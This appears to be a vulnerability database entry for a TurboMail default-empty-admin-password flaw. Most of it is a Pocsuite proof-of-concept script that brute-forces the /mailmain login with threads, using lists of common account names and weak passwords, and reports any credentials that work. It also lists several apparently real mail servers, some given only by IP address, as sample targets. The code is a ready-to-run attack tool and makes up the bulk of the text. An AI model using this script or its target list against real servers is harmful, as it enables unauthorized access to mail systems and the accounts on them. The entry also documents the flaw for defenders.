TurboMail /mailmain 弱密码漏洞

🗓️ 03 Feb 2015 00:00:00Reported by RootType
TurboMail weak password vulnerability in login system. Default installation has empty built-in admin passwords. Exploits a weakness in the initial setup process.

                                                #!/usr/bin/env python
# coding: utf-8

import re
import random
import threading

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class MyThread(threading.Thread):
       def __init__(self,func,args,name=''):
              threading.Thread.__init__(self)
              self.name=name
              self.func=func
              self.args=args
       def run(self):
              apply(self.func,self.args)

def crack_pwd(n,username):
    global SUCCESS
    global USERSINFO
    for password in PASSWD_DIC:
        Postdata = {'uid':username,'pwd':password}      
        response = req.post(URL,data=Postdata,timeout=15)
        keyword = re.search('\xe7\x99\xbb\xe5\xbd\x95\xe6\x88\x90\xe5\x8a\x9f',response.content)
        if password=='':
                password="NULL"
        if keyword:
            USERSINFO.append((username,password))
            SUCCESS = True
            print "\033[32m     [+]SUCCESS  帐号："+username+"     密码:"+password+"\033[0m"
            break
        else:
            print "\033[31m     [+]FAILED!  帐号："+username+"     密码:"+password+"\033[0m"

class TestPOC(POCBase):
    vulID = '1683'  # vul ID
    version = '1'
    author = ['lixin']
    vulDate = '2014-04-08'
    createDate = '2015-01-18'
    updateDate = '2015-01-18'
    references = ['http://drops.wooyun.org/papers/1381']
    name = 'TurboMail 弱密码漏洞 POC'
    appPowerLink = 'www.turbomail.org'
    appName = 'TurboMail'
    appVersion = 'all'
    vulType = 'Weak Password'
    desc = '''
        TurboMail邮件系统是广州拓波软件科技有限公司面向企事业单
        位通信需求而研发的电子邮件服务器系统,本次漏洞出现于系统初
        次安装时未提示更改内置管理员帐号密码造成的。默认安装后内置
        管理员密码均为空。
    '''
    # the sample sites for examine
    samples = ['http://www.turbomail.org:8888/',
                'http://smtp.wunding.com/',
                'http://220.178.102.4:8081',
                'http://www.yd3.com.cn:8080/',
                'http://mail.pyppipe.com:8080',
                'http://mail.baik.com.cn/',
                'http://211.103.235.165/']
    
    def _attack(self):
        return self._verify()

    def _verify(self):
        result={}
        global USER_DIC
        global PASSWD_DIC
        global USERSINFO
        global URL
        global SUCCESS
        USER_DIC = ['postmaster','nobody','sec_bm','sec_sj','admin']
        PASSWD_DIC = ['','admin','password','666666','888888','111111','qwer1234']
        USERSINFO=[]
        SUCCESS=False
        target_url = '/mailmain?type=login'
        URL=self.url+target_url

        #按照字典中的用户数创建等数量任务，并行猜解密码
        threads=[]
        nloops=range(len(USER_DIC))
        for i in nloops:
              t=MyThread(crack_pwd,(i,USER_DIC[i]),crack_pwd.__name__)
              threads.append(t)
        for i in nloops:
              threads[i].start()
        for i in nloops:
              threads[i].join() 

        #任务结束返回结果
        if SUCCESS:
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = USERSINFO[0][0]
            result['AdminInfo']['Password'] = USERSINFO[0][1]
     
        return self.parse_verify(result)

    def parse_verify(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')

        return output

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')

        return output


register(TestPOC)
03 Feb 2015 00:00Current
7.1High risk
Vulners AI Score7.1